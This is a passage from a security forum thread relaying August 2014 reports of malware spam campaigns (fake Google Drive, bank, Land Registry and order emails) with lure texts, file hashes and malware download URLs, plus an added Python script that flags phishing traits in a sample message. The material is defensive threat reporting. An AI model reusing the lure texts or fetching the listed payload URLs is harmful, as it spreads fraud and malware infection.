SPAM frauds, fakes, and other MALWARE deliveries...



AplusWebMaster
2014-08-13, 12:18
FYI...

Fake Google drive SPAM - PDF malware
- http://myonlinesecurity.co.uk/grady-murphy-shared-google-drive3623019-73-malware/
13 Aug 2014 - "Grady Murphy shared Google Drive:3623019-73 to submit@<your email address>, pretending to come from Grady Murphy <random name that matches the name inside the email>, Apps Team, is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... There are several different versions of this email leading to different infection sites and links. The names of the alleged Google Drive owner who wants to share with you change with each email. There is no attachment with this one and they want you to follow the link and download the file to infect you.
Some of the sites are
http ://energydep .net:8080/Gdrive/GDrive025384.exe
http ://bilingdepp .net:8080/Gdrive/GDrive917302.exe
Email looks like:
Accept Grady Murphy Google Drive ID:3623019-73 request clicking on the link below:
Confirm request
Unfortunately, this email is an automated notification, which is unable to receive replies. We’re happy to help you with any questions or concerns you may have. Please contact us directly 24/7 via google .com/support/

13 August 2014: GDrive925483.exe (40kb) Current Virus total detections: 6/54*
This is another one of the spoofed icon files that unless you have “show known file extensions enabled”, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/28fd5d98d57d2289edfc3a327f7b9f493d4fc58c51a70cfbbd6b3474f7c65f68/analysis/1407913490/

178.238.236.109: https://www.virustotal.com/en/ip-address/178.238.236.109/information/
___

Fake PurelyGadgets SPAM - Word doc malware
- http://myonlinesecurity.co.uk/order-id-769019-purelygadgets-com-word-doc-malware-malware/
13 Aug 2013 - "Order id 769019 | PurelyGadgets .com pretending to come from a sender named inform at a random email address is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... This email arrives written in German language and has a zip attachment that when unzipped drops what appears to be a genuine Word Doc. BUT the Doc contains a macro that will infect you, if you use an out of date or older version of word. On previewing it, or opening it in Word 2013 ( which has macros disabled by default ) it tries to tell you to enable macros so that you can read the document. Do -not- ever -enable- macros for any Microsoft office file received by email unless you are 100% sure that you know the sender and are expecting the file... If you still use an older version of Microsoft Word, then you are at risk of being infected by this... Office 2010 and Office 2013 have macros -disabled- by default...

13 August 2014: Bestellen.zip (100 kb) : Extracts to Bestellen.Doc
Current Virus total detections: 10/54*. All of these emails use Social engineering tricks to persuade you to open the attachments that come with the email... when unzipping them and make sure you have “show known file extensions enabled”, And then look carefully at the unzipped file. If it says .EXE then it is a problem and should -not- be run or opened..."
* https://www.virustotal.com/en/file/3d53b54d98e14f9de2a2316fe09ee6b9fe27f2dacdd4ad85f52dd1e16eebb006/analysis/1407936811/
___

UK Land Registry Spam
- http://threattrack.tumblr.com/post/94637538213/uk-land-registry-spam
Aug 13, 2014 - "Subjects Seen:
Notification of direct debit of fees
Typical e-mail details:
Notification Number: 4682787
Mandate Number: LND4682787
###THIS IS AN AUTO NOTIFICATION EMAIL. DO NOT REPLY TO THE SENDER OF THIS EMAIL. IF YOU HAVE A QUERY PLEASE REFER TO THE INFORMATION BELOW ###
This is notification that Land Registry will debit 1527.00 GBP from your nominated account on or as soon as possible before 18/08/2014.
Details of fees that we shall be collecting by direct debit for the applications charged are now available to view.
You can access these by opening attached report.
If you have an enquiry relating to your VDD account please contact Customer Support at customersupport@ landregistry .gsi .gov.uk or call on 0844 892 1111. For all enquiries, please quote your key number.
Thank you,
Land Registry

Malicious File Name and MD5:
LND_Report_13082014.exe (4E3480ADAF846BE2073246C9879290D2)
LND_Report_4682787.zip (EAD6A8A2A9613175112E6C75D247B0BC)

Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/8c26e0fcb0496b40853e9589e35632c0/tumblr_inline_na95u2Ihd01r6pupn.png

Tagged: UK Land Registry, Upatre

:fear: :mad: :sad:

AplusWebMaster
2014-08-14, 13:54
FYI...

Fake Citicorp SPAM – PDF malware
- http://myonlinesecurity.co.uk/citicorp-mail-report-attached-fake-pdf-malware/
14 Aug 2014 - "Citicorp Mail Out Report Attached pretending to come from CITICorp <random name @ citicorp .com> is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... Email looks like:

From Securitas, please do not reply to this e-mail as it is auto generated.
For any problems please e-mail derry.andrews@ securitas .uk .com

14 August 2014 Q100515078_Mail Out Report.zip (9kb): Extracts to Q100229861_Mail Out Report.exe
Current Virus total detections: 3/54*. This Citicorp Mail Out Report Attached is another one of the spoofed icon files that unless you have “show known file extensions enabled”, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/0875c59c8f7c69befb7dce934db7c9652614a9ad90cabc37721f56114bb026f0/analysis/1408010403/
___

Fake Charity Trends SPAM ...
- http://blog.mxlab.eu/2014/08/14/backdoor-bot-ed-attached-to-emails-with-subject-like-oder-invoice-9156230_08-xls/
Aug 14, 2014 - "... intercepted a new trojan distribution campaign by email with the subject “Oder invoice 9156230_08.xls”. This email is sent from the spoofed address and has the following body:

Dear *******@*******.co.uk,
Please find attached invoice #9156230_08 from 13/08/2014.
Thanks!
Reyes Mcdaniel .
We’re happy to help you with any questions or concerns you may have. Please contact us directly 24/7 via hxxp ://www.charitytrends .org/ContactUs.aspx

The attached ZIP file has the name 9156230_08.zip which contains the folder Inv_3145835_453_979154.xls. In this folder the 131 kB large file Inv_3145835_453_979154.xls.scr is found. Please note that the subject line and attachment file names may change with each message.
The trojan is known as Backdoor.Bot.ED. At the time of writing, 1 of the 53 AV engines did detect the trojan at Virus Total*..."
* https://www.virustotal.com/en/file/4ac7416ea64789afabee6c7ff152cf4c552c303baef009270adca11238667bc4/analysis/1408011038/

- http://blog.mxlab.eu/2014/08/14/fake-charity-trends-email-regarding-donation-contains-trojan/
Aug 14, 2014 - "... intercept a new trojan distribution campaign by email with the subject “Thank you for your generous donation! Charity Trends .”. This email is sent from the spoofed address and has the following body:

Charity Trends®
Dear *******@*******.com,
Thank you for your generous donation of 2623 GBP, which we received today.
Your generosity will make an immediate difference in the lives of many people who need your help. The funds raised will go toward them.
You will find all information about your donation in zip archive.You are making a difference!
Thanks again for your kindness,
Elsa Nash ...

The attached ZIP file has the name DON_9683272_90.zip and contains the folder DON_4356984_08_14_14. Inside this folder, the 102 kB large file DON_4356_45984_08_14_14.scr will be found. Please note that the subject line and attachment file names may change with each message. The trojan is known as Trojan/Win32.Zbot, Win32:Malware-gen, HEUR/Malware.QVM20.Gen or Mal/Generic-S... 4/54 VirusTotal*..."
* https://www.virustotal.com/en/file/3158101b5a61094a960bc3e4a17240c153efa8cbb6b1eaa26e6d2ab6c06cafe9/analysis/1408011666/
___

Fake Citibank SPAM - PDF malware
- http://myonlinesecurity.co.uk/citibank-re-account-documents-uploaded-fake-pdf-malware/
14 Aug 2014 - "'Citibank RE: Account documents have been uploaded' pretending to come from Citibank <noreply@ citibank .com> is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... Email looks like:
citibank .com
RE: Account Documents
To: <REDACTED>
Case: C4055427
Your Documents have been uploaded to dropbox. In order to download / view Please click here to download / view .
All web filed documents (with the exception of downloaded accounts templates) are available to view / download for 10 days after their original submission. Once accepted, these changes will be displayed on the public record...

14 August 2014 Document-7119.zip ; Extracts to Document-7119.scr ;
Current Virus total detections: 0/54*. This 'Citibank RE: Account documents have been uploaded' is another one of the spoofed icon files that unless you have “show known file extensions enabled”, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/110dc2cdabc3ffcc924312b44e025072ec2641bf55bdcc8abdc426ddd9e8eced/analysis/1408029154/
___

ZeroLocker
- http://www.webroot.com/blog/2014/08/14/zero-locker/
Aug 14, 2014 - "... we saw FireEye and Fox-IT provide the ability to decrypt files encrypted by older cryptolocker variants. They used the command and control servers seized by the FBI during operation Tovar. Since they have access to those RSA keys they essentially have the password required for every single file encrypted by a Cryptolocker variant that used Evgeniy Bogachev’s botnet. That is a major portion of the traditional red GUI cryptolocker that became famous... since the emergence of their tool to decrypt files for free, there has been a new encrypting ransomware going around that aims at scamming you into thinking this is a similar helpful tool – except that it demands something all -scams- do - payment:
> https://www.webroot.com/blog/wp-content/uploads/2014/08/blograrw.bmp
This newest edition to the ever popular business model that is encrypting ransomware doesn’t really have many improvements over the others we’ve already seen. Using -Bitcoin- for payment is standard now. This variant doesn’t show the GUI until all encryption is completed and the computer is suddenly restarted. Upon restart this window is presented and threatens that you will lose all your files if you close or remove it. The payment structure is right where industry average is – PAINFUL. This specific variant we analyzed does not delete the VSS (Volume Shadow Service) and you can get all your files back by using programs like Shadow Explorer... expect issues like this to be fixed once this malware is adopted by more botnets for widespread distribution... remember that with encrypting ransomware the best protection is going to be a good backup solution. This can be either through the cloud or offline external storage. Keeping it up to date is key so as not to lose productivity..."
___

Suspicious login message Faked, distributes Backdoor
- http://blog.trendmicro.com/trendlabs-security-intelligence/suspicious-login-message-faked-distributes-backdoor/
Aug 14, 2014 - "Legitimate services are often used by cybercriminals to try and make their attacks more convincing. Recently, I spotted attacks that used services and platforms like Google Drive and Dropbox in order to look less suspicious to unwary users. I received a spammed message like the one shown right below that supposedly came from Gmail itself. It warned me that someone logged into my account from an unknown device. However, all of the links in it pointed to a Google Drive URL:
Sample spam email:
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2014/08/login3.png
Even though the email message is -similar- to a legitimate Gmail message, a careful user will note that the displayed e-mail address and the supposed source address did -not- match. Further examination of the email’s headers indicates that the email was, in fact, sent via a website’s mail form... all the links provided in the email actually go to an HTML file hosted on Google Drive. This HTML file is used to detect the operating system and browser of the user... Further code also differentiates what payloads are delivered based on the user’s browser. This is what the user would see (here, running Firefox):
Fake plugin download page:
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2014/08/login2.png
... while the HTML code can differentiate between different configurations, a relatively limited number of payloads are actually delivered. These are detected as BKDR_PERCS.A. This -backdoor- steals email credentials and user names and passwords. It also logs -keystrokes- as part of its information theft routines. As a backdoor, it can also accept remote commands from the attackers... The actual malicious payloads are hosted on Google Drive as well. The attackers upload new files to be used in this attack on a fairly regular basis, although the behavior remains the same... As these files are located on legitimate services, they are also sent via HTTPS, which helps evade some web filtering techniques. In addition, it used a -compromised- website’s mailer system and an IPv6 address, which can also evade email reputation services..."
(More detail at the trendmicro URL at the top.)
___

Beware of Risky Ads on Tumblr
- https://blog.malwarebytes.org/malvertising-2/2014/08/beware-of-risky-ads-on-tumblr/
Aug 14, 2014 - "Online users have come to rely on social media and social networking sites to also update them on current events and commentaries, general news, and what’s happening just down the street and around the corner. Twitter and Facebook are the first go-to sites for most when it comes to real-time news updates. For some, Tumblr.

dailynewsz[dot]tumblr[dot]com

We found the above site posting what appears as news clips but not on a daily basis, as indicated in the URL, unfortunately. According to Google Translate, the site uses both Swahili and Urdu. This site serves ads on its default page and on individual posts. So every time someone shares one, the ads are shared with it. Below is a screenshot of a post:
> https://blog.malwarebytes.org/wp-content/uploads/2014/08/dailynewsz-post.png
Online advertisement is a major source of revenue. Unfortunately, normal ads can easily become malvertisements, serving as a go-between for users and sites hosting -malicious- software. For this particular Tumblr page, it uses the ad network Yllix Media. Google Safe Browsing profiled its official website here*. Other third-party sites either blacklist** the domain or flag it as untrustworthy*** due to its history of leading users to infected sites. As of this writing, the ads are benign, but we may never know several months from now if this will still be the case... we encourage you to use ad blockers, such as AdBlock Plus (ABP) or NoScript (for Mozilla-based browsers only), if you don’t want ads to appear on sites you visit..."
* https://safebrowsing.clients.google.com/safebrowsing/diagnostic?site=yllix.com/

** http://labs.sucuri.net/?blacklist=yllix.com

*** https://www.mywot.com/en/scorecard/yllix.com

:fear::fear: :mad:

AplusWebMaster
2014-08-15, 17:11
FYI...

Fake Barclays SPAM - Trojan.Ransom.ED
- http://blog.mxlab.eu/2014/08/15/fake-email-transaction-completed-from-barclays-contains-trojan-ransom-ed/
Aug 15, 2014 - "... intercepted a new trojan distribution campaign by email with the subject “Your transaction is completed”. This email is sent from the spoofed address “Barclays.NET” <support@ barclays .net> and has the following body:
Transaction is completed. 8678 GBP has been successfully transfered.
If the transaction was made by mistake please contact our customer service.
Payment receipt is attached.
*** This is an automatically generated email, please do not reply ***
Barclays.Net 2013 Corporation. All rights reserved.

The attached ZIP file has the name Payment receipt 1534465.zip and contains the 70 kB large file Payment receipt 8821991.exe (note: file name may vary with each email). The trojan is known as Trojan.Ransom.ED or Mal/Generic-S. At the time of writing, 2 of the 54 engines did detect the trojan at Virus Total*..."
* https://www.virustotal.com/en/file/baa52d35dd98c788729f661c9c9d7b4053fcbdb3083943b9d517b83fe38063a6/analysis/1408097500/
___

Fake VOIP SPAM - Word macro script
- http://blog.mxlab.eu/2014/08/15/fake-email-from-voip-inc-installs-trojan-downloader-using-word-macro-script/
Aug 15, 2014 - "... intercepted a campaign by email with the subject “Your Order No 355253536 | Mob Inc.” which includes a malicious Word document that allows the installation of a trojan downloader using the macro functionality from Word. This email is sent from spoofed addresses and has the following body:
Thank you for ordering from VOIP Inc.
This message is to inform you that your order has been received and is currently being processed.
Your order reference is 488910845598.
You will need this in all correspondence.
This receipt is NOT proof of purchase.
We will send a printed invoice by mail to your billing address.
You have chosen to pay by credit card. Your card will be charged for the amount
of 805.74 USD and “VOIP Inc.”
will appear next to the charge on your statement.
Your purchase information appears below in the file.

The attached ZIP file has the name Order.zip and contains the 41 kB large file Order.Doc. The Order.Doc is a genuine Word document but the file contains a malicious macro feature. On opening the Word document, instructions are given on how to enable the content and activate the -malicious- macro script... The downloader is known as W97M/Downloader, MO97:Downloader-DU, VBA/TrojanDownloader.Agent.AL, Trojan-Downloader:W32/Agent.DVCR, Trojan-Downloader.VBA.Agent or Trojan.Mdropper. At the time of writing, 8 of the 53 AV engines did detect the trojan downloader at Virus Total*..."
* https://www.virustotal.com/en/file/af8694825d3d7eb470255b9dd858e6544ac54df9295bb373bc8205e8fe27722c/analysis/1408099896/

:mad: :fear::fear:

AplusWebMaster
2014-08-19, 20:06
FYI...

Fake Companies House Spam
- http://threattrack.tumblr.com/post/95187807503/companies-house-annual-return-spam
Aug 19, 2014 - "Subjects Seen:
(AR01) Annual Return received
Typical e-mail details:
Thank you for completing a submission Reference # (9586474).
(AR01) Annual Return
Your unique submission number is 9586474
Please quote this number in any communications with Companies House.
Check attachment to confirm acceptance or rejection of this filing.

Malicious File Name and MD5:
AR01_021434.scr (3324B40B5D213BEC291F9F86F0D80F64)
AR01_021434.zip (7D65D78B6E35843B6FF3C4C46BAAC37A)

Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/342609410f7d088e77e269adf8ed8b38/tumblr_inline_nak1zyZubX1r6pupn.png

Tagged: Companies House, Upatre
___

JPMorgan Chase Secure Message Spam
- http://threattrack.tumblr.com/post/95215399913/jpmorgan-chase-secure-message-spam
Aug 19, 2014 - "Subjects Seen:
Daily Report - August 19, 2014
Typical e-mail details:
This is a secure, encrypted message.
Desktop Users:
Open the attachment (message_zdm.html) and follow the instructions.
Mobile Users:
Voltage secure mail is not currently supported on mobile devices. If you experience issues, please access your secure message from a fully functional browser.

Malicious URLs:
192.241.124.71 /securemail/jpmchase.com/formpostdir/Java/Java_update.exe

Malicious File Name and MD5:
message_zdm.html (550CB01F07DB2363437C8627697C6B1F)
Java_update.exe (38d75db0a575891506b1ff0484a03cd0)

Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/332320ce00484e282636a9e2d20b0764/tumblr_inline_naklp7JVOT1r6pupn.png

192.241.124.71: https://www.virustotal.com/en/ip-address/192.241.124.71/information/

Tagged: JPMorgan, Chase, Dyreza
___

- http://myonlinesecurity.co.uk/jpmorgan-chase-co-daily-report-august-19-2014-malware/
Aug 19 2014 - "'JPMorgan Chase & Co Daily Report – August 19, 2014' pretending to come from various names at @ jpmorgan .com is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... email looks like:

Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2014/08/Daily-Report-August-19-2014.png

... the html attachment that comes with the email looks like the below and clicking the link hidden behind the Click to read message button leads to a fake Java_update.exe
> http://myonlinesecurity.co.uk/wp-content/uploads/2014/08/Daily-Report-August-19-2014_2.png
Today's Date: Java_update.exe .. Current Virus total detections: 5/53*
All of these emails use Social engineering tricks to persuade you to open the attachments that come with the email... careful when unzipping them and make sure you have “show known file extensions enabled”, And then look carefully at the unzipped file. If it says .EXE then it is a problem and should -not- be run or opened..."
* https://www.virustotal.com/en/file/003529bb37382ad19d22b39d3295e297220c21d59418eb1b861ac3a7fb012a96/analysis/
___

Fake Evernote extension serves Ads
- https://blog.malwarebytes.org/intelligence/2014/08/fake-evernote-extension-serves-advertisements/
Aug 19, 2014 - "... a Multiplug PUP that installs a -fake- Evernote browser extension. Fellow researchers can find the link to this sample on VirusTotal here*...
> https://blog.malwarebytes.org/wp-content/uploads/2014/08/cert_info.png
When you execute the PUP, it silently installs a web extension for the Google Chrome, Torch, and Comodo Dragon browsers. The extension takes the form of three obfuscated JavaScript files and one HTML file. The picture shows these files installed in Chrome’s extension directory on a Windows 7 PC.
> https://blog.malwarebytes.org/wp-content/uploads/2014/08/chrome_ext_files.png
... The extension that’s installed is called “Evernote Web,” just like the real extension from Evernote.com. When taking a look at the Chrome extensions page, we can see the extension installed there with the ID “lbfehkoinhhcknnbdgnnmjhiladcgbol,” just like the real Evernote Web extension.
> https://blog.malwarebytes.org/wp-content/uploads/2014/08/evernote.png
Clicking “Visit website” directs the user to the chrome webstore page for the actual Evernote Web extension. Chrome believes the real extension is installed, as verified by the Launch App button. When clicking this button with the fake extension installed, nothing happens, whereas normally the user is met with an Evernote log in screen.
> https://blog.malwarebytes.org/wp-content/uploads/2014/08/fake_evernote_chrome_store.png
On the surface, it may seem like the pop ups and advertisements are coming from the websites themselves, but are in fact from the fake Evernote web extension.
Fortunately, removing the extension is a simple task. For Chrome users, simply visit the extensions page and click the picture of a garbage can, and you’re done. You also might want to run a free scan using your Antivirus or Anti-malware programs (like Malwarebytes Anti-Malware) to make sure there wasn’t anything -else- added while you had the extension."
* https://www.virustotal.com/en/file/6a15febcf9a963a2c5122a71d690b5987f78d59b7e9bc5f28f991ce53043fbf4/analysis/
___

Fake Scotiabank SPAM – PDF malware
- http://myonlinesecurity.co.uk/scotiabank-new-instructions-international-local-transfers-fake-pdf-malware/
18 Aug 2014 - "Scotiabank New Instructions for International and local transfers pretending to come from Mallerlyn Bido <mallerlyn.bido@ scotiabank .com> is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... Email reads:
Dear Clients
Hereby we inform you that starting next Tuesday, August 19 all instructions of local and international transfers that are sent to our institution must be completed by a transfer form specifically allocated for the purpose, which will be replacing the letter instruction tend to complete.
This new document has been implemented to meet international requirements and simultaneously control to make their operations safer.
We take this opportunity to inform you that the operations of International Transfers can be made via our internet platform banking the need to complete these types of forms.
Annex find the forms that apply to transfers in USD and EUR as well as the form used for ACH transfers manuals with some notes to use as a guide to complete. These templates can be saved for you with your details for future use.(See attached file: Outgoing Global.doc Form) (See attached file: Outgoing JPM.doc Form) (See attached file: Form ACH..doc) ...
Best regards,
Mallerlyn Bido | Gerente Soporte al Cliente | BSC ...

18 August 2014: New Instructions for International and Local transfers.zip ( 8kb) :
Extracts to New Instructions for International and Local transfers.exe
Current Virus total detections: 3/52*. This Scotiabank New Instructions for International and local transfers is another one of the spoofed icon files that unless you have “show known file extensions enabled”, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/2d844bbc8af9af835423ef9d862d86eac7f2f07812c0e0b263124de9e9d98b68/analysis/1408393889/

:mad: :fear:
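The Trend Micro write-up above (a sender address shown to the user that does not match the real one, headers revealing a web site's mail form, every link going to a file on Google Drive) and the ThreatTrack JPMorgan post (an HTML attachment whose hidden link fetches Java_update.exe from a bare IP address) describe checks a mail gateway or an analyst can automate. The script below is an added example, not code from either blog or from this thread's poster. It parses a constructed message modelled on those two lures and reports the mismatches. The header names X-PHP-Originating-Script and Return-Path are standard ones; the sender addresses, hostnames, the IPv6 address and the Google Drive file id are constructed placeholders, and the only value taken from the page is the 192.241.124.71/.../Java_update.exe URL from the ThreatTrack post.

```python
"""Header and link triage for lures like the fake Gmail 'suspicious login'
alert and the JPMorgan 'secure message' HTML attachment described above.
Added example; SAMPLE below is a constructed message, not a real capture."""
import re
from email import message_from_string, policy
from html.parser import HTMLParser
from urllib.parse import urlsplit

EXEC_EXT = (".exe", ".scr", ".pif", ".com", ".bat", ".cmd", ".js", ".jar")
EMAIL_RE = re.compile(r"[\w.+-]+@[\w-]+(?:\.[\w-]+)+")
IPV4_RE = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}$")

class LinkCollector(HTMLParser):
    """Collect (href, visible text) for every <a> in an HTML fragment."""
    def __init__(self):
        super().__init__()
        self.links, self._href, self._text = [], None, []
    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href, self._text = dict(attrs).get("href") or "", []
    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)
    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append((self._href, "".join(self._text).strip()))
            self._href = None

def extract_links(html):
    parser = LinkCollector()
    parser.feed(html)
    return parser.links

def host_of(url):
    return (urlsplit(url).hostname or "").lower()

def check_link(href, text):
    """Findings for one anchor: visible host differs from the real host,
    the target is a bare IP address, or the target is an executable."""
    findings = []
    host = host_of(href)
    # Link text that looks like a host/URL but points elsewhere is the
    # 'displayed address vs actual address' mismatch from the Trend Micro post.
    if text and " " not in text and "." in text:
        shown = host_of(text if "://" in text else "http://" + text)
        if shown and shown != host:
            findings.append(f"text shows {shown} but link goes to {host}")
    if IPV4_RE.match(host):
        findings.append(f"link host is a bare IP address: {host}")
    path = urlsplit(href).path
    if path.lower().endswith(EXEC_EXT):
        findings.append(f"link fetches an executable: {path.rsplit('/', 1)[-1]}")
    return findings

def triage_message(raw):
    """Return human-readable findings for one RFC 5322 message."""
    msg = message_from_string(raw, policy=policy.default)
    findings = []
    sender = msg["From"].addresses[0]
    # An address embedded in the display name is what the recipient sees;
    # it must match the address the mail really carries.
    for shown in EMAIL_RE.findall(sender.display_name):
        if shown.lower() != sender.addr_spec.lower():
            findings.append(f"From shows {shown} but is really {sender.addr_spec}")
    # PHP's mail() can stamp the originating script: a web form, not a mail client.
    script = msg.get("X-PHP-Originating-Script")
    if script:
        findings.append(f"sent by a web site's mailer script ({script})")
    # Inspect links in the HTML body and in HTML attachments alike.
    for part in msg.walk():
        if part.get_content_type() == "text/html":
            where = part.get_filename() or "body"
            for href, text in extract_links(part.get_content()):
                findings.extend(f"[{where}] {f}" for f in check_link(href, text))
    return findings

# Constructed message modelled on the two lures (placeholder hosts and ids;
# the 192.241.124.71 URL is the one ThreatTrack reported).
SAMPLE = """\
Return-Path: <www-data@example-compromised.invalid>
Received: from example-compromised.invalid ([2001:db8::1]) by mx.example.net
X-PHP-Originating-Script: 33:contact_form.php
From: "Google <no-reply@accounts.google.com>" <alerts@example-compromised.invalid>
To: victim@example.net
Subject: Suspicious sign in prevented
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="b1"

--b1
Content-Type: text/html; charset="utf-8"

<p>Someone just used your password to try to sign in to your Google Account.</p>
<p><a href="https://docs.google.com/uc?id=CONSTRUCTED-FILE-ID">accounts.google.com/security</a></p>
--b1
Content-Type: text/html; charset="utf-8"
Content-Disposition: attachment; filename="message_zdm.html"

<a href="http://192.241.124.71/securemail/jpmchase.com/formpostdir/Java/Java_update.exe">Click to read message</a>
--b1--
"""

if __name__ == "__main__":
    for finding in triage_message(SAMPLE):
        print("-", finding)
```

Run stand-alone it prints five findings for the sample: the display-name address that differs from the real From address, the PHP mailer stamp, the body link whose text names accounts.google.com but resolves to docs.google.com, and the attachment link to an executable on a bare IP. The display-name check is deliberately narrow (it fires only when an address is visibly embedded in the name); a production filter would also compare the From domain with the Return-Path and DKIM signing domain.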

AplusWebMaster
2014-08-20, 14:07
FYI...

Cryptolocker flogged on YouTube
- http://www.theregister.co.uk/2014/08/20/cryptolocker_flogged_on_youtube/
20 Aug 2014 - "Cryptolocker is being flogged over YouTube by vxers who have bought advertising space... researchers made the discovery while monitoring YouTube and website banners for instances where malware writers had actually purchased space to foist their wares on -unpatched- web users. The duo who will present at the upcoming Virus Bulletin 2014 conference in Seattle wrote in a paper that advertisement networks were a viable way to flog viruses and trojans. "We conclude that ad networks could be leveraged to aid, or even be substituted for current exploit kits," they said. Purchased ad space was a cheap and effective means of foisting browser malware allowing attackers to filter victims by language, location, and interests, VB reported. Malware contained in ads could be obfuscated and then unleashed once conditions like operating systems, browser versions and other elements were met.
> http://regmedia.co.uk/2014/08/19/tghfgh55.png
CryptoLocker surfaced in September distributed through Gameover ZeuS. It encrypted important files such as images and documents on compromised Windows machines before demanding that victims pay up to $500 in BitCoins within 72 hours for the private keys necessary to unlock files. CryptoLocker used AES symmetric cryptography to encrypt the files and encrypted the AES key with an RSA-2048 bit public key generated on its server side. It came as -malvertisers- were caught flinging malware over Yahoo! ad networks*...
> http://regmedia.co.uk/2014/08/19/fghji87y6t.png
... Many excess ad spaces were flogged through affiliates which may accept advertisements without checking the authenticity of the buyer nor the code to be run. Even those that do could end up foisting malware if they failed to detect an attacker's code alterations made after the purchase in order to quietly slip in the malware. The research pair said there was very little advertising networks could do to prevent the attacks."
* http://www.theregister.co.uk/2014/08/11/cryptowall_malvertising_yahoo_ad_network/

> https://www.virusbtn.com/conference/vb2014/abstracts/KashyapKotovNavaraj.xml
___

Fake Order SPAM – PDF malware
- http://myonlinesecurity.co.uk/order-pdf-malware/
20 Aug 2014 - "'Order – PDF' which comes as an email with a subject of order-6539-8.20.2014.pdf ( where the number is random & the date changes daily ) is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... These emails have no body content and just a subject of order-6539-8.20.2014.pdf ( the number is random ). They appear to come from a load of common first names with weird characters forming the second part of the alleged senders... previous post about this type of attack:
- http://myonlinesecurity.co.uk/infected-malformed-pdf-attachments-emails/
Today’s version although it pretends to be a PDF file is actually a zip file that probably either uses some unknown exploit to extract it or the bad actors sending today’s malware have misconfigured the botnet sending it and it won’t automatically extract at all so users will be safe...
20 August 2014: order-6539-8.20.2014.pdf (84 kb) Extracts to order 8.20.2014.exe
Current Virus total detections for pdf is: 2/50*. Current Virus total detections for the extracted .exe: 2/53**. This is another one of the spoofed icon files that unless you have “show known file extensions enabled”, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/f84c3bb9f4dcb2961193ad4cdbcd7e882a14f0e19a5f8f68c8aa8c5bd73ba7e0/analysis/1408523288/

** https://www.virustotal.com/en/file/3e135db147e93080de32d3bc5eb27049dec5542493062cc2c7e338d901ddf559/analysis/1408523722/
___

'Reveton' ransomware adds powerful password stealer
- https://www.computerworld.com/s/article/9250503/_Reveton_ransomware_adds_powerful_password_stealer
Aug 20, 2014 - "A type of malware called Reveton, which -falsely- warns users they've broken the law and demands payment of a fine, has been -upgraded- with powerful password stealing functions, according to Avast*. Reveton is in a class of nasty programs known as "ransomware," which includes the notorious Cryptolocker program that encrypts a computer's files. The FBI issued a warning about Reveton in August 2012 after its Internet Crime Complaint Center was flooded with complaints. The malware often infects computers via drive-by download when a person visits a website rigged to automatically exploit software vulnerabilities. Users are helpless after the computer is locked, with Reveton demanding a few hundred dollars as ransom payable via various web-money services... The version of Reveton analyzed by Avast also has another password stealer from the Papras family of malware. It's not as effective as Pony but can disable security programs, the company wrote on its blog*. This particular sample of Reveton was pre-programmed to search a web browser's history and cookies to see if the user had visited online sites of 17 German banks... Around February 2013, an ethnic Russian man was arrested in Dubai upon request of Spanish police for allegedly coordinating Reveton campaigns, netting... US$1.3 million. Ten other people were also arrested on money laundering charges for allegedly laundering the proceeds and transferring funds to Russia, according to Trend Micro**."
* http://blog.avast.com/2014/08/19/reveton-ransomware-has-dangerously-evolved/

** http://blog.trendmicro.com/trendlabs-security-intelligence/key-figure-in-police-ransomware-activity-nabbed-2/
___

Linux Trojan makes the jump to Windows
- http://www.theinquirer.net/inquirer/news/2361245/chinese-linux-trojan-makes-the-jump-to-windows
Aug 20, 2014 - "... the original malware known as "Linux.Dnsamp" is a Distributed Denial of Service (DDoS) Trojan, which, according to the company blog*, transfers between Linux machines, altering the startup scripts, collecting and sending machine configuration data to the hackers' server and then running silently waiting for orders. Now it appears that the same hackers have ported the Trojan to run in Windows as "Trojan.Dnsamp.1"**. The Windows version gains entry to the system under the guise of a Windows Service Test called "My Test 1". It is then saved in the system folder of the infected machine under the name "vmware-vmx.exe". When triggered, just like its Linux counterpart, the Trojan sends system information back to the hackers' central server and then awaits the signal to start a DDoS attack or start downloading other malicious programs... Although the threat of malware is an everyday hazard to most computer users, to find an attack on Linux is much rarer, and to find any kind of malware that has been ported from one operating system to another is almost unheard of... Project Shield***, an initiative designed to help smaller web servers fight off DDoS attacks."
* http://news.drweb.com/show/?i=5760&c=23&lng=en&p=1

** http://news.drweb.com/show/?i=5903&lng=en&c=14

*** https://projectshield.withgoogle.com/en/

:mad::mad: :fear:

AplusWebMaster
2014-08-21, 16:30
FYI...

Tech Support SCAMS rip big brand security software with fake warnings
